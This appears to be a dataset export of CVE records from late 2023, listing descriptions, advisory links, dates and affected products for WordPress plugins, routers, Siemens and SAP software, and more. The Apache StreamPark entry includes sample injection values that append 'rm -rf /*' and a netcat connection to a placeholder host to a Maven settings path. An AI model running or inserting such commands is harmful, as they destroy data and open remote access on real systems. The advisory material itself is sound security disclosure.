CVE_ID
stringlengths 9
213
⌀ | Description
stringlengths 24
3.87k
⌀ | URL
stringlengths 12
306
⌀ | DateReserved
stringlengths 19
24
⌀ | DatePublished
stringlengths 19
75
⌀ | DateUpdated
stringlengths 19
61
⌀ | AffectedProducts
stringlengths 46
143k
⌀ |
---|---|---|---|---|---|---|
CVE-2023-49162 | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BigCommerce BigCommerce For WordPress.This issue affects BigCommerce For WordPress: from n/a through 5.0.6.
| https://patchstack.com/database/vulnerability/bigcommerce/wordpress-bigcommerce-for-wordpress-plugin-5-0-6-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve | 2023-11-22T23:36:04.378Z | 2023-12-21T13:55:31.215Z | 2023-12-21T13:55:31.215Z | {'Vendor': 'BigCommerce', 'Product': 'BigCommerce For WordPress', 'Versions': 'n/a'} |
CVE-2023-49898 | In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.
Mitigation:
all users should upgrade to 2.1.2
Example:
##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&":
/usr/share/java/maven-3/conf/settings.xml || rm -rf /*
/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &
| https://lists.apache.org/thread/qj99c03r4td35f8gbxq084b8qmv2fyr3 | 2023-12-01T03:12:29.421Z | 2023-12-15T12:13:25.086Z | 2023-12-15T12:13:25.086Z | {'Vendor': 'Apache Software Foundation', 'Product': 'Apache StreamPark (incubating)', 'Versions': '2.0.0'} |
CVE-2023-49877 | IBM System Storage Virtualization Engine TS7700 3957-VEC, 3948-VED and 3957-VEC could allow a remote authenticated user to obtain sensitive information, caused by improper filtering of URLs. By submitting a specially crafted HTTP GET request, an attacker could exploit this vulnerability to view application source code, system configuration information, or other sensitive data related to the Management Interface. IBM X-Force ID: 272651. | https://www.ibm.com/support/pages/node/7092383 | 2023-12-01T01:47:32.862Z | 2023-12-13T20:36:31.219Z | 2023-12-13T20:36:31.219Z | {'Vendor': 'IBM', 'Product': 'System Storage Virtualization Engine', 'Versions': '8.52.103.23, 8.53.1.21'} |
CVE-2023-49174 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dFactory Responsive Lightbox & Gallery allows Stored XSS.This issue affects Responsive Lightbox & Gallery: from n/a through 2.4.5.
| https://patchstack.com/database/vulnerability/responsive-lightbox/wordpress-responsive-lightbox-plugin-2-4-5-cross-site-scripting-xss-vulnerability?_s_id=cve | 2023-11-22T23:36:21.490Z | 2023-12-15T14:14:22.560Z | 2023-12-15T14:14:22.560Z | {'Vendor': 'dFactory', 'Product': 'Responsive Lightbox & Gallery', 'Versions': 'n/a'} |
CVE-2023-49436 | Tenda AX9 V22.03.01.46 has been discovered to contain a command injection vulnerability in the 'list' parameter at /goform/SetNetControlList. | https://github.com/ef4tless/vuln/blob/master/iot/AX9/SetNetControlList-2.md | 2023-11-27T00:00:00 | 2023-12-07T00:00:00 | 2023-12-07T15:27:39.276335 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49123 | A vulnerability has been identified in Solid Edge SE2023 (All versions < V223.0 Update 10). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the current process. | https://cert-portal.siemens.com/productcert/pdf/ssa-589891.pdf | 2023-11-22T14:43:13.524Z | 2024-01-09T09:59:55.117Z | 2024-01-09T09:59:55.117Z | {'Vendor': 'Siemens', 'Product': 'Solid Edge SE2023', 'Versions': 'All versions < V223.0 Update 10'} |
CVE-2023-49089 | Umbraco is an ASP.NET content management system (CMS). Starting in version 8.0.0 and prior to versions 8.18.10, 10.8.1, and 12.3.0, Backoffice users with permissions to create packages can use path traversal and thereby write outside of the expected location. Versions 8.18.10, 10.8.1, and 12.3.0 contain a patch for this issue. | https://github.com/umbraco/Umbraco-CMS/security/advisories/GHSA-6324-52pr-h4p5 | 2023-11-21T18:57:30.429Z | 2023-12-12T19:02:33.259Z | 2023-12-12T19:02:33.259Z | {'Vendor': 'umbraco', 'Product': 'Umbraco-CMS', 'Versions': '>= 8.0.0, < 8.18.10, >= 9.0.0-rc001, < 10.8.1, >= 11.0.0-rc1, < 12.3.4'} |
CVE-2023-49820 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gordon Böhme, Antonio Leutsch Structured Content (JSON-LD) #wpsc allows Stored XSS.This issue affects Structured Content (JSON-LD) #wpsc: from n/a through 1.5.3.
| https://patchstack.com/database/vulnerability/structured-content/wordpress-structured-content-json-ld-wpsc-plugin-1-5-3-cross-site-scripting-xss-vulnerability?_s_id=cve | 2023-11-30T14:51:04.753Z | 2023-12-14T15:53:36.806Z | 2023-12-14T15:53:36.806Z | {'Vendor': 'Gordon Böhme, Antonio Leutsch', 'Product': 'Structured Content (JSON-LD) #wpsc', 'Versions': 'n/a'} |
CVE-2023-49578 | SAP Cloud Connector - version 2.0, allows an authenticated user with low privilege to perform Denial of service attack from adjacent UI by sending a malicious request which leads to low impact on the availability and no impact on confidentiality or Integrity of the application.
| https://me.sap.com/notes/3362463 | 2023-11-27T18:07:40.886Z | 2023-12-12T01:08:32.245Z | 2023-12-12T01:08:32.245Z | {'Vendor': 'SAP_SE', 'Product': 'SAP Cloud Connector', 'Versions': '2.0'} |
CVE-2023-49082 | aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Improper validation makes it possible for an attacker to modify the HTTP request (e.g. insert a new header) or even create a new HTTP request if the attacker controls the HTTP method. The vulnerability occurs only if the attacker can control the HTTP method (GET, POST etc.) of the request. If the attacker can control the HTTP version of the request it will be able to modify the request (request smuggling). This issue has been patched in version 3.9.0. | https://github.com/aio-libs/aiohttp/security/advisories/GHSA-qvrw-v9rv-5rjx | 2023-11-21T18:57:30.428Z | 2023-11-29T20:07:29.341Z | 2023-11-29T20:07:29.341Z | {'Vendor': 'aio-libs', 'Product': 'aiohttp', 'Versions': '< 3.9.0'} |
CVE-2023-49128 | A vulnerability has been identified in Solid Edge SE2023 (All versions < V223.0 Update 10). The affected application contains an out of bounds write past the end of an allocated buffer while parsing a specially crafted PAR file. This could allow an attacker to execute code in the context of the current process. | https://cert-portal.siemens.com/productcert/pdf/ssa-589891.pdf | 2023-11-22T14:50:33.103Z | 2024-01-09T10:00:00.630Z | 2024-01-09T10:00:00.630Z | {'Vendor': 'Siemens', 'Product': 'Solid Edge SE2023', 'Versions': 'All versions < V223.0 Update 10'} |
CVE-2023-49344 | Temporary data passed between application components by Budgie Extras Window Shuffler applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel. | https://github.com/UbuntuBudgie/budgie-extras/security/advisories/GHSA-rhwf-6fc9-9jvm | 2023-11-27T03:17:52.865Z | 2023-12-14T21:31:09.613Z | 2023-12-14T21:31:09.613Z | {'Vendor': 'Ubuntu Budgie', 'Product': 'Budgie Extras', 'Versions': 'v1.4.0'} |
CVE-2023-49190 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chandra Shekhar Sahu Site Offline Or Coming Soon Or Maintenance Mode allows Stored XSS.This issue affects Site Offline Or Coming Soon Or Maintenance Mode: from n/a through 1.5.6.
| https://patchstack.com/database/vulnerability/site-offline/wordpress-site-offline-or-coming-soon-or-maintenance-mode-plugin-1-5-6-cross-site-scripting-xss-vulnerability?_s_id=cve | 2023-11-22T23:36:56.848Z | 2023-12-15T15:10:56.818Z | 2023-12-15T15:10:56.818Z | {'Vendor': 'Chandra Shekhar Sahu', 'Product': 'Site Offline Or Coming Soon Or Maintenance Mode', 'Versions': 'n/a'} |
CVE-2023-49485 | JFinalCMS v5.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the column management department. | https://github.com/Rabb1ter/cms/blob/main/There%20is%20a%20storage%20type%20XSS%20in%20the%20column%20management%20department.md | 2023-11-27T00:00:00 | 2023-12-08T00:00:00 | 2023-12-08T15:08:57.838718 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49256 | It is possible to download the configuration backup without authorization and decrypt included passwords using hardcoded static key. | https://cert.pl/en/posts/2024/01/CVE-2023-49253/ | 2023-11-24T11:53:46.294Z | 2024-01-12T14:24:20.325Z | 2024-01-12T14:24:20.325Z | {'Vendor': 'Hongdian', 'Product': 'H8951-4G-ESP', 'Versions': '0'} |
CVE-2023-49743 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jeff Starr Dashboard Widgets Suite allows Stored XSS.This issue affects Dashboard Widgets Suite: from n/a through 3.4.1.
| https://patchstack.com/database/vulnerability/dashboard-widgets-suite/wordpress-dashboard-widgets-suite-plugin-3-4-1-cross-site-scripting-xss-vulnerability?_s_id=cve | 2023-11-30T13:21:40.736Z | 2023-12-14T14:37:54.468Z | 2023-12-14T14:37:54.468Z | {'Vendor': 'Jeff Starr', 'Product': 'Dashboard Widgets Suite', 'Versions': 'n/a'} |
CVE-2023-49313 | A dylib injection vulnerability in XMachOViewer 0.04 allows attackers to compromise integrity. By exploiting this, unauthorized code can be injected into the product's processes, potentially leading to remote control and unauthorized access to sensitive user data. | https://github.com/horsicq/XMachOViewer | 2023-11-26T00:00:00 | 2023-11-28T00:00:00 | 2023-11-28T14:46:42.150992 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49169 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in datafeedr.Com Ads by datafeedr.Com allows Stored XSS.This issue affects Ads by datafeedr.Com: from n/a through 1.2.0.
| https://patchstack.com/database/vulnerability/ads-by-datafeedrcom/wordpress-ads-by-datafeedr-com-plugin-1-2-0-cross-site-scripting-xss-vulnerability?_s_id=cve | 2023-11-22T23:36:21.489Z | 2023-12-15T14:07:52.132Z | 2023-12-15T14:07:52.132Z | {'Vendor': 'datafeedr.com', 'Product': 'Ads by datafeedr.com', 'Versions': 'n/a'} |
CVE-2023-49493 | DedeCMS v5.7.111 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the v parameter at selectimages.php. | https://github.com/Hebing123/cve/issues/2 | 2023-11-27T00:00:00 | 2023-12-07T00:00:00 | 2023-12-07T15:58:57.663852 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49240 | Unauthorized access vulnerability in the launcher module. Successful exploitation of this vulnerability may affect service confidentiality. | https://consumer.huawei.com/en/support/bulletin/2023/12/ | 2023-11-24T07:33:47.174Z | 2023-12-06T09:06:04.495Z | 2023-12-06T09:06:04.495Z | {'Vendor': 'Huawei', 'Product': 'HarmonyOS', 'Versions': '4.0.0, 3.1.0, 3.0.0, 2.0.0'} |
CVE-2023-49581 | SAP GUI for Windows and SAP GUI for Java allow an unauthenticated attacker to access information which would otherwise be restricted and confidential. In addition, this vulnerability allows the unauthenticated attacker to write data to a database table. By doing so the attacker could increase response times of the AS ABAP, leading to mild impact on availability.
| https://me.sap.com/notes/3392547 | 2023-11-27T18:07:40.886Z | 2023-12-12T01:10:14.702Z | 2024-01-16T13:56:46.654Z | {'Vendor': 'SAP_SE', 'Product': 'SAP NetWeaver Application Server ABAP and ABAP Platform', 'Versions': 'SAP_BASIS 700, SAP_BASIS731, SAP_BASIS740, SAP_BASIS750'} |
CVE-2023-49094 | Symbolicator is a symbolication service for native stacktraces and minidumps with symbol server support. An attacker could make Symbolicator send arbitrary GET HTTP requests to internal IP addresses by using a specially crafted HTTP endpoint. The response could be reflected to the attacker if they have an account on Sentry instance. The issue has been fixed in the release 23.11.2.
| https://github.com/getsentry/symbolicator/security/advisories/GHSA-6576-pr6j-h9c6 | 2023-11-21T18:57:30.429Z | 2023-11-30T04:49:37.404Z | 2023-11-30T04:49:37.404Z | {'Vendor': 'getsentry', 'Product': 'symbolicator', 'Versions': '>= 0.3.3, < 23.11.2'} |
CVE-2023-49647 | Improper access control in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom SDKs for Windows before version 5.16.10 may allow an authenticated user to conduct an escalation of privilege via local access. | https://www.zoom.com/en/trust/security-bulletin/ZSB-24001/ | 2023-11-28T18:18:33.930Z | 2024-01-12T21:44:00.743Z | 2024-01-12T21:44:00.743Z | {'Vendor': 'Zoom Video Communications, Inc.', 'Product': 'Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom SDKs for Windows before version 5.16.10', 'Versions': 'before 5.16.0'} |
CVE-2023-49846 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Paul Bearne Author Avatars List/Block allows Stored XSS.This issue affects Author Avatars List/Block: from n/a through 2.1.17.
| https://patchstack.com/database/vulnerability/author-avatars/wordpress-author-avatars-list-block-plugin-2-1-16-cross-site-scripting-xss-vulnerability?_s_id=cve | 2023-11-30T17:12:47.221Z | 2023-12-14T14:07:15.503Z | 2023-12-14T14:07:15.503Z | {'Vendor': 'Paul Bearne', 'Product': 'Author Avatars List/Block', 'Versions': 'n/a'} |
CVE-2023-49145 | Apache NiFi 0.7.0 through 1.23.2 include the JoltTransformJSON Processor, which provides an advanced configuration user interface that is vulnerable to DOM-based cross-site scripting. If an authenticated user, who is authorized to configure a JoltTransformJSON Processor, visits a crafted URL, then arbitrary
JavaScript code can be executed within the session context of the authenticated user. Upgrading to Apache NiFi 1.24.0 or 2.0.0-M1 is the recommended mitigation. | https://nifi.apache.org/security.html#CVE-2023-49145 | 2023-11-22T19:51:06.932Z | 2023-11-27T22:14:02.850Z | 2023-11-27T22:14:02.850Z | {'Vendor': 'Apache Software Foundation', 'Product': 'Apache NiFi', 'Versions': '0.7.0'} |
CVE-2023-49515 | Insecure Permissiosn vulnerability in TP Link TC70 and C200 WIFI Camera v.3 firmware v.1.3.4 and fixed in v.1.3.11 allows a physically proximate attacker to obtain sensitive information via a connection to the UART pin components. | https://github.com/VineethKumarM/TAPO-TC70-Unauthorized-root-access-using-UART/tree/master | 2023-11-27T00:00:00 | 2024-01-17T00:00:00 | 2024-01-17T01:53:28.775606 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49000 | An issue in ArtistScope ArtisBrowser v.34.1.5 and before allows an attacker to bypass intended access restrictions via interaction with the com.artis.browser.IntentReceiverActivity component. | https://github.com/actuator/com.artis.browser/blob/main/CWE-94.md | 2023-11-20T00:00:00 | 2023-12-27T00:00:00 | 2023-12-27T21:20:05.076759 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49779 | Stored cross-site scripting vulnerability exists in the anchor tag of GROWI versions prior to v6.0.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. | https://weseek.co.jp/ja/news/2023/11/21/growi-prevent-xss6/ | 2023-12-07T02:39:53.189Z | 2023-12-26T07:21:06.972Z | 2023-12-26T07:21:06.972Z | {'Vendor': 'WESEEK, Inc.', 'Product': 'GROWI', 'Versions': 'prior to v6.0.0'} |
CVE-2023-49283 | microsoft-graph-core the Microsoft Graph Library for PHP. The Microsoft Graph Beta PHP SDK published packages which contained test code that enabled the use of the phpInfo() function from any application that could access and execute the file at `vendor/microsoft/microsoft-graph-core/tests/GetPhpInfo.php`. The phpInfo function exposes system information. The vulnerability affects the GetPhpInfo.php script of the PHP SDK which contains a call to the phpinfo() function. This vulnerability requires a misconfiguration of the server to be present so it can be exploited. For example, making the PHP application’s /vendor directory web accessible. The combination of the vulnerability and the server misconfiguration would allow an attacker to craft an HTTP request that executes the phpinfo() method. The attacker would then be able to get access to system information like configuration, modules, and environment variables and later on use the compromised secrets to access additional data. This problem has been patched in version 2.0.2. If an immediate deployment with the updated vendor package is not available, you can perform the following temporary workarounds: delete the `vendor/microsoft/microsoft-graph-core/tests/GetPhpInfo.php` file, remove access to the /vendor directory, or disable the phpinfo function
| https://github.com/microsoftgraph/msgraph-sdk-php-core/security/advisories/GHSA-mhhp-c3cm-2r86 | 2023-11-24T16:45:24.312Z | 2023-12-05T22:44:40.433Z | 2023-12-05T22:44:40.433Z | {'Vendor': 'microsoftgraph', 'Product': 'msgraph-sdk-php-core', 'Versions': '< 2.0.2'} |
CVE-2023-49329 | Anomali Match before 4.6.2 allows OS Command Injection. An authenticated admin user can inject and execute operating system commands. This arises from improper handling of untrusted input, enabling an attacker to elevate privileges, execute system commands, and potentially compromise the underlying operating system. The fixed versions are 4.4.5, 4.5.4, and 4.6.2. The earliest affected version is 4.3. | https://www.anomali.com/collaborate/ciso-blog | 2023-11-27T00:00:00 | 2024-01-19T00:00:00 | 2024-01-19T20:28:02.855335 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49796 | MindsDB connects artificial intelligence models to real time data. Versions prior to 23.11.4.1 contain a limited file write vulnerability in `file.py` Users should use MindsDB's `staging` branch or v23.11.4.1, which contain a fix for the issue. | https://github.com/mindsdb/mindsdb/security/advisories/GHSA-crhp-7c74-cg4c | 2023-11-30T13:39:50.863Z | 2023-12-11T20:38:25.330Z | 2023-12-11T20:38:25.330Z | {'Vendor': 'mindsdb', 'Product': 'mindsdb', 'Versions': '< 23.11.4.1'} |
CVE-2023-49954 | The CRM Integration in 3CX before 18.0.9.23 and 20 before 20.0.0.1494 allows SQL Injection via a first name, search string, or email address. | https://cve-2023-49954.github.io/ | 2023-12-03T00:00:00 | 2023-12-25T00:00:00 | 2023-12-25T07:19:17.468212 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49684 | null | null | 2023-11-29T17:48:17.255Z | 2023-12-21T23:12:28.842Z | 2024-01-02T19:57:18.347Z | {'Vendor': 'NA', 'Product': 'NA', 'Versions': ''} |
CVE-2023-49391 | An issue was discovered in free5GC version 3.3.0, allows remote attackers to execute arbitrary code and cause a denial of service (DoS) on AMF component via crafted NGAP message. | https://github.com/free5gc/free5gc/issues/497 | 2023-11-27T00:00:00 | 2023-12-22T00:00:00 | 2023-12-22T10:27:02.944413 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49807 | Stored cross-site scripting vulnerability when processing the MathJax exists in GROWI versions prior to v6.0.0. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the site using the product. | https://weseek.co.jp/ja/news/2023/11/21/growi-prevent-xss6/ | 2023-12-07T02:39:44.808Z | 2023-12-26T07:21:11.658Z | 2023-12-26T07:21:11.658Z | {'Vendor': 'WESEEK, Inc.', 'Product': 'GROWI', 'Versions': 'prior to v6.0.0'} |
CVE-2023-49104 | An issue was discovered in ownCloud owncloud/oauth2 before 0.6.1, when Allow Subdomains is enabled. An attacker is able to pass in a crafted redirect-url that bypasses validation, and consequently allows an attacker to redirect callbacks to a Top Level Domain controlled by the attacker. | https://owncloud.org/security | 2023-11-21T00:00:00 | 2023-11-21T00:00:00 | 2023-11-21T21:25:36.804365 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49554 | Use After Free vulnerability in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the do_directive function in the modules/preprocs/nasm/nasm-pp.c component. | https://github.com/yasm/yasm/issues/249 | 2023-11-27T00:00:00 | 2024-01-02T00:00:00 | 2024-01-02T23:09:23.560714 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49411 | Tenda W30E V16.01.0.12(4843) contains a stack overflow vulnerability via the function formDeleteMeshNode. | https://github.com/GD008/TENDA/blob/main/w30e/tenda_w30e_deleteMesh/w30e_deleteMesh.md | 2023-11-27T00:00:00 | 2023-12-07T00:00:00 | 2023-12-07T17:33:16.490776 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49738 | An information disclosure vulnerability exists in the image404Raw.php functionality of WWBN AVideo dev master commit 15fed957fb. A specially crafted HTTP request can lead to arbitrary file read. | https://talosintelligence.com/vulnerability_reports/TALOS-2023-1881 | 2023-11-30T22:10:08.294Z | 2024-01-10T15:48:11.922Z | 2024-01-10T18:00:09.610Z | {'Vendor': 'WWBN', 'Product': 'AVideo', 'Versions': 'dev master commit 15fed957fb'} |
CVE-2023-49692 | A vulnerability has been identified in RUGGEDCOM RM1224 LTE(4G) EU (All versions < V7.2.2), RUGGEDCOM RM1224 LTE(4G) NAM (All versions < V7.2.2), SCALANCE M804PB (All versions < V7.2.2), SCALANCE M812-1 ADSL-Router (Annex A) (All versions < V7.2.2), SCALANCE M812-1 ADSL-Router (Annex B) (All versions < V7.2.2), SCALANCE M816-1 ADSL-Router (Annex A) (All versions < V7.2.2), SCALANCE M816-1 ADSL-Router (Annex B) (All versions < V7.2.2), SCALANCE M826-2 SHDSL-Router (All versions < V7.2.2), SCALANCE M874-2 (All versions < V7.2.2), SCALANCE M874-3 (All versions < V7.2.2), SCALANCE M876-3 (EVDO) (All versions < V7.2.2), SCALANCE M876-3 (ROK) (All versions < V7.2.2), SCALANCE M876-4 (All versions < V7.2.2), SCALANCE M876-4 (EU) (All versions < V7.2.2), SCALANCE M876-4 (NAM) (All versions < V7.2.2), SCALANCE MUM853-1 (EU) (All versions < V7.2.2), SCALANCE MUM856-1 (EU) (All versions < V7.2.2), SCALANCE MUM856-1 (RoW) (All versions < V7.2.2), SCALANCE S615 (All versions < V7.2.2), SCALANCE S615 EEC (All versions < V7.2.2). An Improper Neutralization of Special Elements used in an OS Command with root privileges vulnerability exists in the parsing of the IPSEC configuration. This could allow malicious local administrators to issue commands on system level after a new connection is established. | https://cert-portal.siemens.com/productcert/pdf/ssa-068047.pdf | 2023-11-29T17:51:25.463Z | 2023-12-12T11:27:26.231Z | 2023-12-12T11:27:26.231Z | {'Vendor': 'Siemens', 'Product': 'RUGGEDCOM RM1224 LTE(4G) EU', 'Versions': 'All versions < V7.2.2'} |
CVE-2023-49153 | Cross-Site Request Forgery (CSRF) vulnerability in Saiful Islam Add to Cart Text Changer and Customize Button, Add Custom Icon.This issue affects Add to Cart Text Changer and Customize Button, Add Custom Icon: from n/a through 2.0.
| https://patchstack.com/database/vulnerability/woo-add-to-cart-text-change/wordpress-add-to-cart-text-changer-and-customize-button-add-custom-icon-plugin-2-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | 2023-11-22T23:35:38.290Z | 2023-12-18T22:10:58.473Z | 2023-12-18T22:10:58.473Z | {'Vendor': 'Saiful Islam', 'Product': 'Add to Cart Text Changer and Customize Button, Add Custom Icon', 'Versions': 'n/a'} |
CVE-2023-49446 | JFinalCMS v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via /admin/nav/save. | https://github.com/ysuzhangbin/cms/blob/main/There%20is%20a%20CSRF%20in%20the%20newly%20added%20navigation%20management%20area.md | 2023-11-27T00:00:00 | 2023-12-05T00:00:00 | 2023-12-05T14:57:22.327571 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49295 | quic-go is an implementation of the QUIC protocol (RFC 9000, RFC 9001, RFC 9002) in Go. An attacker can cause its peer to run out of memory sending a large number of PATH_CHALLENGE frames. The receiver is supposed to respond to each PATH_CHALLENGE frame with a PATH_RESPONSE frame. The attacker can prevent the receiver from sending out (the vast majority of) these PATH_RESPONSE frames by collapsing the peers congestion window (by selectively acknowledging received packets) and by manipulating the peer's RTT estimate. This vulnerability has been patched in versions 0.37.7, 0.38.2 and 0.39.4. | https://github.com/quic-go/quic-go/security/advisories/GHSA-ppxx-5m9h-6vxf | 2023-11-24T16:45:24.314Z | 2024-01-10T21:40:58.881Z | 2024-01-10T21:40:58.881Z | {'Vendor': 'quic-go', 'Product': 'quic-go', 'Versions': '= 0.40.0, >= 0.39.0, < 0.39.4, >= 0.38.0, < 0.38.2, < 0.37.7'} |
CVE-2023-49061 | An attacker could have performed HTML template injection via Reader Mode and exfiltrated user information. This vulnerability affects Firefox for iOS < 120. | https://bugzilla.mozilla.org/show_bug.cgi?id=1861420 | 2023-11-20T15:00:28.168Z | 2023-11-21T14:28:55.728Z | 2023-11-21T14:28:55.728Z | {'Vendor': 'Mozilla', 'Product': 'Firefox for iOS', 'Versions': 'unspecified'} |
CVE-2023-49431 | Tenda AX9 V22.03.01.46 has been discovered to contain a command injection vulnerability in the 'mac' parameter at /goform/SetOnlineDevName. | https://github.com/ef4tless/vuln/blob/master/iot/AX9/SetOnlineDevName.md | 2023-11-27T00:00:00 | 2023-12-07T00:00:00 | 2023-12-07T16:02:45.878831 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49827 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme allows Reflected XSS.This issue affects Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1.
| https://patchstack.com/database/vulnerability/soledad/wordpress-soledad-theme-8-4-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | 2023-11-30T15:27:45.875Z | 2023-12-14T14:32:12.339Z | 2023-12-14T14:32:12.339Z | {'Vendor': 'PenciDesign', 'Product': 'Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme', 'Versions': 'n/a'} |
CVE-2023-49124 | A vulnerability has been identified in Solid Edge SE2023 (All versions < V223.0 Update 10). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the current process. | https://cert-portal.siemens.com/productcert/pdf/ssa-589891.pdf | 2023-11-22T14:43:13.524Z | 2024-01-09T09:59:56.361Z | 2024-01-09T09:59:56.361Z | {'Vendor': 'Siemens', 'Product': 'Solid Edge SE2023', 'Versions': 'All versions < V223.0 Update 10'} |
CVE-2023-49935 | An issue was discovered in SchedMD Slurm 23.02.x and 23.11.x. There is Incorrect Access Control because of a slurmd Message Integrity Bypass. An attacker can reuse root-level authentication tokens during interaction with the slurmd process. This bypasses the RPC message hashes that protect against undesired MUNGE credential reuse. The fixed versions are 23.02.7 and 23.11.1. | https://www.schedmd.com/security-archive.php | 2023-12-03T00:00:00 | 2023-12-14T00:00:00 | 2024-01-03T03:06:27.612392 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49173 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in 10to8 Sign In Scheduling Online Appointment Booking System allows Stored XSS.This issue affects Sign In Scheduling Online Appointment Booking System: from n/a through 1.0.9.
| https://patchstack.com/database/vulnerability/10to8-online-booking/wordpress-10to8-online-appointment-booking-system-plugin-1-0-9-cross-site-scripting-xss-vulnerability?_s_id=cve | 2023-11-22T23:36:21.489Z | 2023-12-14T15:34:27.970Z | 2023-12-14T15:34:27.970Z | {'Vendor': '10to8', 'Product': 'Sign In Scheduling Online Appointment Booking System', 'Versions': 'n/a'} |
CVE-2023-49489 | Reflective Cross Site Scripting (XSS) vulnerability in KodeExplorer version 4.51, allows attackers to obtain sensitive information and escalate privileges via the APP_HOST parameter at config/i18n/en/main.php. | https://github.com/kalcaddle/KodExplorer/issues/526 | 2023-11-27T00:00:00 | 2023-12-19T00:00:00 | 2023-12-19T09:12:27.913009 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
CVE-2023-49759 | Cross-Site Request Forgery (CSRF) vulnerability in gVectors Team WooDiscuz – WooCommerce Comments.This issue affects WooDiscuz – WooCommerce Comments: from n/a through 2.3.0.
| https://patchstack.com/database/vulnerability/woodiscuz-woocommerce-comments/wordpress-woodiscuz-woocommerce-comments-plugin-2-3-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | 2023-11-30T13:22:27.401Z | 2023-12-18T22:19:52.358Z | 2023-12-18T22:19:52.358Z | {'Vendor': 'gVectors Team', 'Product': 'WooDiscuz – WooCommerce Comments', 'Versions': 'n/a'} |
CVE-2023-49923 | An issue was discovered by Elastic whereby the Documents API of App Search logged the raw contents of indexed documents at INFO log level. Depending on the contents of such documents, this could lead to the insertion of sensitive or private information in the App Search logs. Elastic has released 8.11.2 and 7.17.16 that resolves this issue by changing the log level at which these are logged to DEBUG, which is disabled by default. | https://discuss.elastic.co/t/enterprise-search-8-11-2-7-17-16-security-update-esa-2023-31/349181 | 2023-12-02T16:06:57.310Z | 2023-12-12T17:53:42.091Z | 2023-12-12T17:53:42.091Z | {'Vendor': 'Elastic', 'Product': 'Enterprise Search', 'Versions': '7.0.0, 8.0.0'} |
CVE-2023-49165 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Real Big Plugins Client Dash allows Stored XSS.This issue affects Client Dash: from n/a through 2.2.1.
| https://patchstack.com/database/vulnerability/client-dash/wordpress-client-dash-plugin-2-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve | 2023-11-22T23:36:04.378Z | 2023-12-15T14:01:13.218Z | 2023-12-15T14:01:13.218Z | {'Vendor': 'Real Big Plugins', 'Product': 'Client Dash', 'Versions': 'n/a'} |
CVE-2023-49427 | Buffer Overflow vulnerability in Tenda AX12 V22.03.01.46, allows remote attackers to cause a denial of service (DoS) via list parameter in SetNetControlList function. | https://github.com/ef4tless/vuln/blob/master/iot/AX12/SetNetControlList.md | 2023-11-27T00:00:00 | 2024-01-10T00:00:00 | 2024-01-10T09:03:29.808129 | {'Vendor': 'n/a', 'Product': 'n/a', 'Versions': 'n/a'} |
